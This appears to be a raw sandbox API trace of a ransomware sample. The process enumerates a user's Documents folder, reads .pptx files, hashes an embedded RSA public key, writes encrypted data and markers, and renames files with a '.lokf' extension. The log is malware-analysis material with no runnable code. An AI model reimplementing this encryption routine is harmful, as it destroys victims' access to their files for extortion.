HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b208 | out: hHeap=0x660000) returned 1 [0058.841] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1f0 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1c0 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1a8 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82b18 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.842] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x12162, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x12162, lpOverlapped=0x0) returned 1 [0058.842] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0058.842] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12167, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.842] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.843] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.843] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.843] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.843] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.843] CloseHandle (hObject=0x5cc) returned 1 [0058.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.844] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.844] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ahBvw6Tj3LoXOmjTDa.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ahbvw6tj3loxomjtda.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ahBvw6Tj3LoXOmjTDa.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ahbvw6tj3loxomjtda.pptx.lokf")) returned 1 [0058.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.844] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.844] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.845] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0058.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.845] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.845] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.845] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0058.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0058.846] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33d387b0, ftCreationTime.dwHighDateTime=0x1d50f0d, ftLastAccessTime.dwLowDateTime=0xce9c1d60, ftLastAccessTime.dwHighDateTime=0x1d56977, ftLastWriteTime.dwLowDateTime=0xce9c1d60, ftLastWriteTime.dwHighDateTime=0x1d56977, nFileSizeHigh=0x0, nFileSizeLow=0x16163, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dY6y1t7mu6jrMGEl.pptx", cAlternateFileName="DY6Y1T~1.PPT")) returned 1 [0058.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bcd8 | out: hHeap=0x660000) returned 1 [0058.846] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dY6y1t7mu6jrMGEl.pptx") returned=".pptx" [0058.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dY6y1t7mu6jrMGEl.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dy6y1t7mu6jrmgel.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.846] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=90467) returned 1 [0058.846] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.848] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1613d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.848] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.849] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.849] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.849] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.849] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x16163, lpOverlapped=0x0) returned 1 [0058.849] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.849] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.849] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.850] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.850] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.850] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.850] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.850] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.850] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.850] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.850] GetLastError () returned 0x0 [0058.850] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.850] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.850] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.850] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.851] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.851] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.851] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16160) returned 0x9c83710 [0058.851] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.851] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82b18 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1a8 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82b60 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1c0 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1f0 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b208 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.851] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.851] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.851] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1f0 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b208 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b208 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b1f0 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b208 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b1f0 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.852] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.852] GetCurrentThreadId () returned 0x9e0 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7ce78 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.852] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.853] GetCurrentThreadId () returned 0x9e0 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x32619a0 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1f0 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b208 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.853] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.853] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b1d8 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b220 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.854] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.854] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 